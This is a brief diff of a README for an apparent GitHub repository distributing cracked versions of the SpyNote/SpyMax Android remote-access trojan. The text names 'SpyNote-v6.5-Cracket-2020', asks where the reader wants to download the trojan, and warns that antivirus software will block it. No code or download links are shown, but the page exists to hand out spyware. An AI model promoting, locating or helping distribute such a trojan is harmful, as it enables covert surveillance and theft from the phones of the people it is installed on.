githuob/SpyMAX-v4-/README.md

 # SpyMAX-v4-
-Android tester V6.4=Spy-Note v6

-SpyNote-v6.5-Cracket-2020

-WHERE DO YOU WANT TO DOWNLOAD THE TROJAN?
+WHERE DO YOU WANT TO DOWNLOAD THE TROJAN
 -----------------------------------------------
 ATTENTION THE PROGRAM IS A TROJAN
 THE ANTIVIRUS WILL NOT LET EXECUTION